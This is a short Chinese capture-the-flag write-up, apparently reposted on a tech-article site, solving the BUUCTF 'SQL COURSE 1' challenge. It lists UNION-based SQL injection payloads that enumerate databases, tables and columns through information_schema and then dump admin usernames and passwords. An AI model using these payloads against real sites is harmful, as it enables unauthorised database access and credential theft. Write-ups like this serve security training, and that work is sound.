BUU SQL COURSE 1
2021/5/1 19:25:56
本文主要是介绍BUU SQL COURSE 1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x01 题目分析
通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。
这时就很迷,最后只能用老办法看看源码啥的有没有提示
经过观察发现了一个隐藏的URL(心理想:这题是真的鬼[○・`Д´・ ○])
0x02 开始测试
利用and 1=1 和 and 1=2根据页面回显进行判断
利用order by 进行字段查看
进行回显判断
下面就可以进行暴库、暴表、暴字段的操作了
1 暴库:(information_schema,ctftraining,mysql,performance_schema,test,news) 2 ?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata 3 4 暴表:(admin,contents) 5 ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news" 6 7 暴字段:(id,username,password) 8 ?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin" 9 10 暴密码: 11 ?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin
Mysql中concat和group_concat的用法:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc
最后出来了账号密码:
利用账号密码进行登录
这篇关于BUU SQL COURSE 1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-19EntBot.ai: AI Website Chatbot for Product Guides and Development Doc
- 2024-06-17zero-shot-learning-definition-examples-comparison
- 2024-06-06Package Easy(基于 NSIS 的打包exe安装包工具)使用方法-icode9专业技术文章分享
- 2024-06-06基于 casdoor 的 ELK 开源登录认证解决方案: elk-auth-casdoor-icode9专业技术文章分享
- 2024-05-29Elasticsearch慢查询日志配置
- 2024-05-29揭秘华为如此多成功项目的产品关键——Charter模板
- 2024-05-29海外IDC业务拓展的7大挑战
- 2024-05-29InLine Chat功能优化对标Github Copilot,CodeGeeX带来更高效、更直观的编程体验!
- 2024-05-29CodeGeeX 智能编程助手 6 项功能升级,在Visual Studio插件市场霸榜2周!
- 2024-05-29AutoMQ 生态集成 Apache Doris